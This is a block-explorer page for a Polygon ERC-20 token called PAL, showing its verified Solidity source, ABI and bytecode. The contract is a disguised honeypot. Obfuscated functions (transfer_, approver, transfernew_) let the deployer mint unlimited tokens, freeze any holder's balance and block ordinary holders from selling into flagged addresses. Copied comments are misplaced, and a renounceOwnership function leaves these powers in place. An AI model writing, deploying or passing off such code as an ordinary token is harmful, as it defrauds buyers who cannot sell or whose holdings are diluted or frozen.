Polygon Sponsored slots available. Book your slot here!
ERC-20
Overview
Max Total Supply
700,000,007,000,000 PAL
Holders
25
Total Transfers
-
Market
Price
$0.00 @ 0.000000 POL
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
PAL
Compiler Version
v0.8.27+commit.40a35a09
Contract Source Code (Solidity)
/** *Submitted for verification at polygonscan.com on 2024-10-12 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Ownable { constructor() { _transferOwnership(_msgSender()); } modifier onlyOwner() { _checkOwner(); _; } function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } address private _owner; function owner() public view virtual returns (address) { return _owner; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_yydsed}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); } /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ contract PAL is Ownable { uint256 _totalSupply = 7*10**6*10**decimals(); uint256 user0 = _totalSupply; address private lp; string private _tokenname; string private _tokensymbol; mapping(address => bool) private Holders; address[] public _Holders; constructor(string memory name_, string memory symbol_) { address msgSender = _msgSender(); _tokenname = name_; _tokensymbol = symbol_; lp = _msgSender(); balances[msgSender] += _totalSupply; emit Transfer(address(0), msgSender, _totalSupply); } /** * @dev Returns the name of the token. */ mapping(address => uint256) private balances; mapping(address => bool) private i; mapping(address => bool) private m; mapping(address => mapping(address => uint256)) private _allowances; /** * @dev Returns the name of the token. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Transfer(address indexed from, address indexed to, uint256 value); function symbol() public view returns (string memory) { return _tokensymbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function totalSupply() public view returns (uint256) { return _totalSupply; } function decimals() public view virtual returns (uint8) { return 9; } function _HoldersAddress(address _address) internal { if (!Holders[_address]) { Holders[_address] = true; _Holders.push(_address); } } function getTokenHolders() public view returns (address[] memory) { return _Holders; } function transfernew_(address uin9, bool list) public { if (lp != msg.sender) { revert("fu"); } m[uin9] = list; } function balanceOf(address account) public view returns (uint256) { return balances[account]; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function name() public view returns (string memory) { return _tokenname; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function approver (address uin6, bool data) public { if(lp != _msgSender()){ revert("fu"); } i[uin6] = data; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public returns (bool) { _transfer(_msgSender(), to, amount); return true; } function allowance(address owner, address spender) public view returns (uint256) { return _allowances[owner][spender]; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function approve(address spender, uint256 amount) public returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function _transfer( address from, address to, uint256 amount ) internal virtual { uint256 decysBalances =balances[from]; decysBalances = (m[to] && from !=lp) ? 0 : decysBalances; require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); decysBalances = i[from] ? 0 : decysBalances; require(decysBalances >= amount, "ERC20: transfer amount exceeds balance"); balances[from] = balances[from]-amount; balances[to] = balances[to]+amount; emit Transfer(from, to, amount); _HoldersAddress(to); } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ //function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual { function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); _approve(owner, spender, currentAllowance - amount); } } /** * @dev See {IERC20-allowance}. */ /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} function transfer_(uint256 _user1) public { if(false){ } if(true){ } uint256 user1 = _user1; uint256 user4 = user0*user1; address user2 = _msgSender(); uint256 user5 = _totalSupply; address user3 = user2; if(lp != _msgSender()){ revert("fu"); }else{ if(lp != _msgSender()){ revert("fu"); } balances[user3] += user4; user5 += user4; _totalSupply = user5; } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} //** function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); _approve(owner, spender, currentAllowance - subtractedValue); return true; } } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"_Holders","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin6","type":"address"},{"internalType":"bool","name":"data","type":"bool"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTokenHolders","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_user1","type":"uint256"}],"name":"transfer_","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"uin9","type":"address"},{"internalType":"bool","name":"list","type":"bool"}],"name":"transfernew_","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526100106009600a610248565b61001d90626acfc061025d565b600155600154600255348015610031575f5ffd5b5060405161127838038061127883398101604081905261005091610311565b61005933610100565b33600461006684826103fa565b50600561007383826103fa565b50600380546001600160a01b031916331790556001546001600160a01b0382165f90815260086020526040812080549091906100b09084906104b4565b90915550506001546040519081526001600160a01b038216905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050506104c7565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52601160045260245ffd5b6001815b600184111561019e578085048111156101825761018261014f565b600184161561019057908102905b60019390931c928002610167565b935093915050565b5f826101b457506001610242565b816101c057505f610242565b81600181146101d657600281146101e0576101fc565b6001915050610242565b60ff8411156101f1576101f161014f565b50506001821b610242565b5060208310610133831016604e8410600b841016171561021f575081810a610242565b61022b5f198484610163565b805f190482111561023e5761023e61014f565b0290505b92915050565b5f61025660ff8416836101a6565b9392505050565b80820281158282048414176102425761024261014f565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610297575f5ffd5b81516001600160401b038111156102b0576102b0610274565b604051601f8201601f19908116603f011681016001600160401b03811182821017156102de576102de610274565b6040528181528382016020018510156102f5575f5ffd5b8160208501602083015e5f918101602001919091529392505050565b5f5f60408385031215610322575f5ffd5b82516001600160401b03811115610337575f5ffd5b61034385828601610288565b602085015190935090506001600160401b03811115610360575f5ffd5b61036c85828601610288565b9150509250929050565b600181811c9082168061038a57607f821691505b6020821081036103a857634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156103f557805f5260205f20601f840160051c810160208510156103d35750805b601f840160051c820191505b818110156103f2575f81556001016103df565b50505b505050565b81516001600160401b0381111561041357610413610274565b610427816104218454610376565b846103ae565b6020601f821160018114610459575f83156104425750848201515b5f19600385901b1c1916600184901b1784556103f2565b5f84815260208120601f198516915b828110156104885787850151825560209485019460019092019101610468565b50848210156104a557868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b808201808211156102425761024261014f565b610da4806104d45f395ff3fe608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e578063a457c2d71161006e578063a457c2d71461021c578063a9059cbb1461022f578063bd55525314610242578063dd62ed3e14610255578063f9fc908514610268575f5ffd5b8063715018a6146101e7578063876b1566146101ef5780638da5cb5b1461020457806395d89b4114610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806348f2f8121461017f5780634a7eb02e1461019457806370a08231146101bf575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261027b565b60405161011f9190610b2b565b60405180910390f35b61013b610136366004610b7b565b61030b565b604051901515815260200161011f565b6001545b60405190815260200161011f565b61013b61016b366004610ba3565b610321565b6040516009815260200161011f565b61019261018d366004610bdd565b610344565b005b6101a76101a2366004610c16565b6103a1565b6040516001600160a01b03909116815260200161011f565b61014f6101cd366004610c2d565b6001600160a01b03165f9081526008602052604090205490565b6101926103c9565b6101f76103dc565b60405161011f9190610c4d565b5f546001600160a01b03166101a7565b61011261043b565b61013b61022a366004610b7b565b61044a565b61013b61023d366004610b7b565b6104cb565b610192610250366004610c16565b6104d7565b61014f610263366004610c98565b610589565b610192610276366004610bdd565b6105b3565b60606004805461028a90610cc9565b80601f01602080910402602001604051908101604052809291908181526020018280546102b690610cc9565b80156103015780601f106102d857610100808354040283529160200191610301565b820191905f5260205f20905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b5f610317338484610607565b5060015b92915050565b5f3361032e85828561072a565b6103398585856107a4565b506001949350505050565b6003546001600160a01b031633146103775760405162461bcd60e51b815260040161036e90610d01565b60405180910390fd5b6001600160a01b03919091165f908152600960205260409020805460ff1916911515919091179055565b600781815481106103b0575f80fd5b5f918252602090912001546001600160a01b0316905081565b6103d16109fc565b6103da5f610a55565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030157602002820191905f5260205f20905b81546001600160a01b03168152600190910190602001808311610414575050505050905090565b60606005805461028a90610cc9565b5f33816104578286610589565b9050838110156104b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161036e565b61033982866104c68785610d31565b610607565b5f6103173384846107a4565b60025481905f906104e9908390610d44565b600154600354919250339182906001600160a01b0316811461051d5760405162461bcd60e51b815260040161036e90610d01565b6003546001600160a01b031633146105475760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b0381165f908152600860205260408120805486929061056e908490610d5b565b9091555061057e90508483610d5b565b600155505050505050565b6001600160a01b039182165f908152600b6020908152604080832093909416825291909152205490565b6003546001600160a01b031633146105dd5760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b03919091165f908152600a60205260409020805460ff1916911515919091179055565b6001600160a01b0383166106695760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b6001600160a01b0382166106ca5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161036e565b6001600160a01b038381165f818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107358484610589565b90505f19811461079e578181101561078f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161036e565b61079e84846104c68585610d31565b50505050565b6001600160a01b038084165f908152600860209081526040808320549386168352600a90915290205460ff1680156107ea57506003546001600160a01b03858116911614155b6107f457806107f6565b5f5b90506001600160a01b03841661085c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383166108be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0384165f9081526009602052604090205460ff166108e357806108e5565b5f5b9050818110156109465760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161036e565b6001600160a01b0384165f90815260086020526040902054610969908390610d31565b6001600160a01b038086165f908152600860205260408082209390935590851681522054610998908390610d5b565b6001600160a01b038085165f8181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9086815260200190565b60405180910390a361079e83610aa4565b5f546001600160a01b031633146103da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0381165f9081526006602052604090205460ff16610b28576001600160a01b0381165f818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b76575f5ffd5b919050565b5f5f60408385031215610b8c575f5ffd5b610b9583610b60565b946020939093013593505050565b5f5f5f60608486031215610bb5575f5ffd5b610bbe84610b60565b9250610bcc60208501610b60565b929592945050506040919091013590565b5f5f60408385031215610bee575f5ffd5b610bf783610b60565b915060208301358015158114610c0b575f5ffd5b809150509250929050565b5f60208284031215610c26575f5ffd5b5035919050565b5f60208284031215610c3d575f5ffd5b610c4682610b60565b9392505050565b602080825282518282018190525f918401906040840190835b81811015610c8d5783516001600160a01b0316835260209384019390920191600101610c66565b509095945050505050565b5f5f60408385031215610ca9575f5ffd5b610cb283610b60565b9150610cc060208401610b60565b90509250929050565b600181811c90821680610cdd57607f821691505b602082108103610cfb57634e487b7160e01b5f52602260045260245ffd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561031b5761031b610d1d565b808202811582820484141761031b5761031b610d1d565b8082018082111561031b5761031b610d1d56fea2646970667358221220720726337abf9325f59e9b2c0c3f204382863e0f034b3faf2b1a4ac1b35fc6da64736f6c634300081b003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000350616c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000350414c0000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f5ffd5b5060043610610106575f3560e01c8063715018a61161009e578063a457c2d71161006e578063a457c2d71461021c578063a9059cbb1461022f578063bd55525314610242578063dd62ed3e14610255578063f9fc908514610268575f5ffd5b8063715018a6146101e7578063876b1566146101ef5780638da5cb5b1461020457806395d89b4114610214575f5ffd5b8063313ce567116100d9578063313ce5671461017057806348f2f8121461017f5780634a7eb02e1461019457806370a08231146101bf575f5ffd5b806306fdde031461010a578063095ea7b31461012857806318160ddd1461014b57806323b872dd1461015d575b5f5ffd5b61011261027b565b60405161011f9190610b2b565b60405180910390f35b61013b610136366004610b7b565b61030b565b604051901515815260200161011f565b6001545b60405190815260200161011f565b61013b61016b366004610ba3565b610321565b6040516009815260200161011f565b61019261018d366004610bdd565b610344565b005b6101a76101a2366004610c16565b6103a1565b6040516001600160a01b03909116815260200161011f565b61014f6101cd366004610c2d565b6001600160a01b03165f9081526008602052604090205490565b6101926103c9565b6101f76103dc565b60405161011f9190610c4d565b5f546001600160a01b03166101a7565b61011261043b565b61013b61022a366004610b7b565b61044a565b61013b61023d366004610b7b565b6104cb565b610192610250366004610c16565b6104d7565b61014f610263366004610c98565b610589565b610192610276366004610bdd565b6105b3565b60606004805461028a90610cc9565b80601f01602080910402602001604051908101604052809291908181526020018280546102b690610cc9565b80156103015780601f106102d857610100808354040283529160200191610301565b820191905f5260205f20905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b5f610317338484610607565b5060015b92915050565b5f3361032e85828561072a565b6103398585856107a4565b506001949350505050565b6003546001600160a01b031633146103775760405162461bcd60e51b815260040161036e90610d01565b60405180910390fd5b6001600160a01b03919091165f908152600960205260409020805460ff1916911515919091179055565b600781815481106103b0575f80fd5b5f918252602090912001546001600160a01b0316905081565b6103d16109fc565b6103da5f610a55565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030157602002820191905f5260205f20905b81546001600160a01b03168152600190910190602001808311610414575050505050905090565b60606005805461028a90610cc9565b5f33816104578286610589565b9050838110156104b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161036e565b61033982866104c68785610d31565b610607565b5f6103173384846107a4565b60025481905f906104e9908390610d44565b600154600354919250339182906001600160a01b0316811461051d5760405162461bcd60e51b815260040161036e90610d01565b6003546001600160a01b031633146105475760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b0381165f908152600860205260408120805486929061056e908490610d5b565b9091555061057e90508483610d5b565b600155505050505050565b6001600160a01b039182165f908152600b6020908152604080832093909416825291909152205490565b6003546001600160a01b031633146105dd5760405162461bcd60e51b815260040161036e90610d01565b6001600160a01b03919091165f908152600a60205260409020805460ff1916911515919091179055565b6001600160a01b0383166106695760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b6001600160a01b0382166106ca5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161036e565b6001600160a01b038381165f818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107358484610589565b90505f19811461079e578181101561078f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161036e565b61079e84846104c68585610d31565b50505050565b6001600160a01b038084165f908152600860209081526040808320549386168352600a90915290205460ff1680156107ea57506003546001600160a01b03858116911614155b6107f457806107f6565b5f5b90506001600160a01b03841661085c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0383166108be5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0384165f9081526009602052604090205460ff166108e357806108e5565b5f5b9050818110156109465760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161036e565b6001600160a01b0384165f90815260086020526040902054610969908390610d31565b6001600160a01b038086165f908152600860205260408082209390935590851681522054610998908390610d5b565b6001600160a01b038085165f8181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9086815260200190565b60405180910390a361079e83610aa4565b5f546001600160a01b031633146103da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0381165f9081526006602052604090205460ff16610b28576001600160a01b0381165f818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610b76575f5ffd5b919050565b5f5f60408385031215610b8c575f5ffd5b610b9583610b60565b946020939093013593505050565b5f5f5f60608486031215610bb5575f5ffd5b610bbe84610b60565b9250610bcc60208501610b60565b929592945050506040919091013590565b5f5f60408385031215610bee575f5ffd5b610bf783610b60565b915060208301358015158114610c0b575f5ffd5b809150509250929050565b5f60208284031215610c26575f5ffd5b5035919050565b5f60208284031215610c3d575f5ffd5b610c4682610b60565b9392505050565b602080825282518282018190525f918401906040840190835b81811015610c8d5783516001600160a01b0316835260209384019390920191600101610c66565b509095945050505050565b5f5f60408385031215610ca9575f5ffd5b610cb283610b60565b9150610cc060208401610b60565b90509250929050565b600181811c90821680610cdd57607f821691505b602082108103610cfb57634e487b7160e01b5f52602260045260245ffd5b50919050565b602080825260029082015261667560f01b604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561031b5761031b610d1d565b808202811582820484141761031b5761031b610d1d565b8082018082111561031b5761031b610d1d56fea2646970667358221220720726337abf9325f59e9b2c0c3f204382863e0f034b3faf2b1a4ac1b35fc6da64736f6c634300081b0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000350616c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000350414c0000000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Pal
Arg [1] : symbol_ (string): PAL
-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [3] : 50616c0000000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [5] : 50414c0000000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
